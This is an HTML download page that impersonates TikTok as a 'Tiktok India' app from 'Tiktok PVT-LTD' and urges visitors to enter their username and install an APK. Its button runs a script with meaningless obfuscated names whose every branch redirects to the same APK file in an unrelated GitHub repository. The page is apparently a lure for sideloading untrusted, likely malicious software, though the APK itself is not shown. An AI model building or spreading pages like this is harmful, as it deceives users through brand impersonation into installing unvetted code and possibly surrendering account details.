<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>


<style>
body{
background-color:#000;
color:#000;
font-family: sans-serif;
}
p,h1,h2,h3{
color:#fff;
}
.btdabhsodina {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.oiervboiwbv {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  text-align: center;
  min-height: 100vh;
}
.btdabhsodina:hover {
	background-color:#314179;
}
.btdabhsodina:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function weffvwvdfb() 
{
    var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://github.com/technewsindia/kk/raw/main/Tiktik-t.apk"; 
	}
	else if(m<10)
	{
		window.location="https://github.com/technewsindia/kk/raw/main/Tiktik-t.apk";
	}
	else
	{
		window.location="https://github.com/technewsindia/kk/raw/main/Tiktik-t.apk";
	}
}
</script>

</head>
<body>
<center>
<div class="oiervboiwbv">
	<img src="https://i.postimg.cc/76h7sn2D/tikk.png" width="34%" />
	<br>
	<p><h1>Tiktok India</h1>
		<h2>Enjoy all new Tiktok Indian version<br>
		with all new features and Filters.<Br>
		Tiktok PVT-LTD<br> 
		</h2>
<h3>Enter your USERname on (Tiktok-PROS) apk.<br>
Download app and enjoy now!!</h3>
	</p>
	<a onClick="weffvwvdfb()" class="btdabhsodina">Download Now(.APK)</a>
</div>
</center>
</body>
</html>